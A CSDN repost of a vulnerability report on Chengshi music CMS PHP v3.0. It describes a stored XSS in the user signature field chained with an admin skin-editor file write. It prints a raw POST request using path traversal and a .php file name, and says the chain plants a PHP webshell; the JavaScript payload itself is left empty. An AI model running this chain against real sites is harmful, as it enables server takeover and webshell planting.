php版程氏音乐cms管理系统 v3.0后台登录_程氏舞曲CMSPHP3.0储存型xss与后台任意文件写入漏洞...

最新推荐文章于 2023-11-17 13:57:36 发布
最新推荐文章于 2023-11-17 13:57:36 发布
阅读量738 收藏
点赞数
文章标签: php版程氏音乐cms管理系统 v3.0后台登录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39692830/article/details/112870746
版权

### 简要描述:

插入 构造的js

可 getshell

### 详细说明:

user/space.php?ac=edit&op=zl

修改 签名处,没有 任何过滤。xss产生

后台 看了下 可以写任意格式文件。。

抓包。。

POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: 127.0.0.1

Content-Length: 38

DNT: 1

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E

于是 构造js如下。

```

```

插入 签名处

用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)

就会 在 skins\index\html\目录下生成 roker.php 一句话。

### 漏洞证明:

[QQ图片20131017235131.jpg](https://images.seebug.org/upload/201310/17235510517fa700c488456facccdc0ea6d23909.jpg)

loading-bars.svg

weixin_39692830
关注
php版程氏音乐cms管理系统 v3.0后台登录_csdjcms(程氏舞曲管理系统) V 3.0 getshell 漏洞...
weixin_40004051的博客
12-21 944
漏洞作者:Knife/*******************************************************//* csdjcms < V 3.0 getshell Vulnerability/* ========================/* By: : Kn1f3/* E-Mail : 681796@qq.com/*=============...
程氏舞曲管理系统程氏舞曲CMSPHP)GBK v3.0
05-08
程氏舞曲CMSPHP更新时间:2013-01-21 3.0跟以往所有版本都不一样,全部是全新的!1.全新内核 轻量级入口2.比以往版本增加了简单的防CC,防注入,防XXS..等安全措施.3.分类按排序显示方式4.新增专集分类5.完美支持所有...
伊比音乐网站管理php系统ebycmsv1.3.1.090719
08-06
ebycms 1.3.1.090719_beta整合UC测试版 主要功能: 1、支持专集设置,专集图片设置; 2、支持在线播放多种格式的媒体文件(flv,rm,mp3,wma,rmvb,swf); 3、Cookie记录用户信息,AJAX操作注册,登陆; 4、支持用户权限设置,指定每一首歌曲让不同的用户组下载; 5、会员注册及管理(系统默认的用户组:游客,普通,歌手,VIP)可定义每组权限; 6、后
php版程氏音乐cms管理系统 v3.0后台登录_程氏舞曲管理系统CMSPHP
weixin_39618169的博客
12-21 206
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站全自动后台在线升级后台一键升级,官方智能提示升级,升级模式与软件雷同,无需手动下载更新包,更方便、更贴心!不定期更新程序版本,让您的程序与时俱进!强大的会员管理模快你可以用此系统做一个收费的站点,支持...
PHP音乐社交管理系统,Soundkit v2.4.2 - PHP音乐社交分享平台
weixin_39722196的博客
03-10 674
源码简介Soundkit是一个类似于MixCloud、SoundCloud的社交音乐共享平台,允许用户在线上传音乐并与世界分享。之前的名字叫做MusicEngine在线演示https://music.krea8iv.com/demohttp://musicengine.themez.cc/https://me.themez.cc/系统需求Apache 2+ (mod_rewrite)PHP 5.5...
程氏舞曲管理系统程氏舞曲CMSPHP)UTF-8 v3.0.zip
07-07
程氏舞曲CMSPHP3.0 更新时间:2013-01-21 3.0跟以往所有版本都不一样,全部是全新的! 1.全新内核 轻量级入口 2.比以往版本增加了简单的防CC,防注入,防XXS..等安全措施. 3.分类按排序显示方式 4.新增专集分类 5....
程氏舞曲管理系统CMSPHP v3.0 GBK
10-25
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站...
程氏舞曲管理系统CMSPHP v3.0 UTF8
10-25
程氏舞曲系统商业版功能简介全新模版引擎,模板标签化功能酷炫界面随心而动,与众不同。全新标签引擎,轻松做出属于自己的舞曲模版,体验属于自己的视觉盛宴。专业高品质的界面构想,为您带来无与伦比的视觉享受网站...
程氏音乐管理系统 V3.0.rar
07-05
' 软件名称: 程氏音乐系统 Content Management chshdjcms ' 版本编号: V 3.0 ' 官方网站: http://www.chshk.cn ' 官方论坛:http://bbs.chshk.cn ' 版权所有: 程氏网络科技 程氏(QQ:848769359) ' 郑重声明: ' 1、...
小5音乐管理系统
11-05
1,上传压缩包内所有文件夹及文件,并设置所有文件夹和文件属性为775或者777 2,上传完文件包以后,打开你的域名会自动转跳至安装界面。 3,如果出现程序报错,请编辑你主机的php.ini 找到display_errors = On 修改为 display_errors = off 4,如使用过程中遇到问题,可加官方QQ群
音乐后台管理系统
06-21
一个简单的音乐后台管理系统php代码+mysql,数据库要自己去创建,有些地方要自己修改
爱青檬CMS音乐程序系统php版v4.0
08-07
爱青檬CMS音乐程序系统是一个以php MySQL进行开发的php音乐网站。爱青檬CMS V4.0版本在3.57的基础上优化了大部分代码,使用了新版4.0风格后台管理员界面。3.57用户可直接升级到4.0版本。升级以后把3.57的数据库备份文件导入到4.0中即可。安装方法:程序上传到空间后,在浏览器地址栏输入 //你的域名/ 即可。后台地址:  //你的域名/admin.php
music-management-system:专为分享音乐而构建的 CMS - 使用 Meteor 构建
06-09
音乐管理系统 专为音乐博主打造的平台。 我对这个系统的目标有两个:1) 设置一个基于 Meteor 的应用程序,2) 创建一个可以在浏览站点的同时播放音乐的博客(一个新的 Myspace)。 因为我是在业余时间构建它,并且在构建它的同时我正在学习 Meteor 和 History API,所以这将是一个漫长而漫长的过程。 版本 1.0 目标 管理员控制面板 后提交 图片上传 音乐上传或解析链接(YouTube、Soundcloud 等) 客户端音乐播放器 (HTML5),带有简单的播放列表(将新文件添加到列表末尾) 浏览网站时保持音乐(History API) 版本 1.1 目标 评论系统 版本 1.2 目标 播放列表编辑,功能更丰富的音乐播放器 版本 1.3 目标 主题系统
PHP音乐系统-前卫音乐系统源码 v3.5.rar
07-10
PHP音乐系统-前卫音乐系统源码,用于搭建基于PHP MYSQL平台的音乐网站源码,免费开源,支持GBK、UTF8编码。后台部模块:内容审核管理、全局设置、界面风格、静态生成、云平台管理等。前台支持在线音乐播放、收藏和用户登录等功能。
PHP音乐社交管理系统,Soundkit v2.4.2 PHP音乐社交分享平台
weixin_36221149的博客
03-10 363
系统需求Apache 2+ (mod_rewrite)PHP 5.5+ (MySQLi, OpenSSL, cURL, GD, mbstring)MySQL 5+安装方法建立数据库;编辑 config.php 的第6-9行,设置数据库;将 MYSQL\MusicEngine.sql 导入到数据库中;使用 adminuser 和密码 123456 进行后台登录。更新日志Version 2.4.2AD...
程氏舞曲管理系统php版 v2.5,程氏舞曲CMS最新php版本多处sql注入漏洞
weixin_39811842的博客
03-13 291
### 简要描述:操蛋捏。### 详细说明:昨天刚下载的,2.16号更新的版本。第一处在管理后台:https://images.seebug.org/upload/app/controllers/admin/news.php第66行```public function so(){$key = $this->input->get('key');//使用get方式获取相关参数,没做处理$u...
唱片公司音乐发行管理系统是一款利用PbootCMS系统第二次开发的VT音乐发行管理系统,本程序适合音乐发行公司使用。
m0_73252106的博客
07-23 175
本程序是采用PbootCMS开发的一个音乐发行公司系统,方便音乐发行宣传,获取用户,无数据库,程序界面简单,方便音乐发行公司使用。如果你不是音乐发行公司本程序还配置的有第三方发行入口方便站长使用,另外本程序还配置的有第三方版权登记入口,方便站长使用。可扩展服务及模板,极大的方便了开发者扩展系统功能。本系统采用PbootCMS作为底层框架开发。后台采用PbootCMS后台管理框架。用户可以对自己的需求留言。
基于PHP音乐网站后台管理系统设计与实现
qq1744828575的博客
11-17 610
文章分析了音乐平台是要跟随时代和科技的进步一步一步不断改进的,参考了发展较好的平台来对自己的系统进行完善,也分析了制作音乐后台管理系统的需求以及可行性,目的是让用户在不花费任何费用的情况下可以收听到自己喜欢的音乐,让后台管理员也可以快捷的完成对网站的管理工作,也对系统核心功能的使用进行了详细的说明以及展示,并且进行了功能测试和压力测试确保音乐网站后台管理系统在以后的工作的压力下也可以完成正常的功能运转给用户带来好的体验感。B/S结构可以说是当下最适合Web开发的,是对之前技术的改进,是技术进步的体现。
如何把("苏序" / "史氏"("苏涣" / "杨氏"("苏不欺" / "蒲氏", "苏不凝"), "苏洵" / "程氏"("苏轼" / "王弗","苏辙" / "史氏")))放入顺序串SqString类的data数组中且括号和/不能去掉
最新发布
12-03
将家谱关系表示成二叉树,可以采用链式存储结构,每个节点包含三个数据域:data、lchild、rchild,其中data存放家谱记录,lchild和rchild分别指向该节点的左右孩子。SqString类是一个顺序串类,可以通过遍历二叉树将...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值